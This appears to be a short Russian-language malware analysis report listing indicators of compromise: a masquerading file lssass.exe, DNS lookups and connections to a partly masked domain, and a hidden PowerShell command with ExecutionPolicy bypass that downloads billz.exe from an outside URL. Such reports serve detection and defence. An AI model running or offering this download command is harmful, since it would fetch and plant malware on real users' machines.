Техническая информация
- https://classicclassiccars.com/exp/billz.exe как c:\users\public\lssass.exe
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1356
- %TEMP%\1008234.cvr
- 'cl#####classiccars.com':443
- 'cl#####classiccars.com':443
- DNS ASK cl#####classiccars.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle hidden -ExecutionPolicy bypass -nologo -noprofile -c IEX ((New-Object System.Net.WebClient)).DownloadFile('https://classicclassiccars.com/exp/billz.exe','C:\Users\Public\lssass.exe...' (со скрытым окном)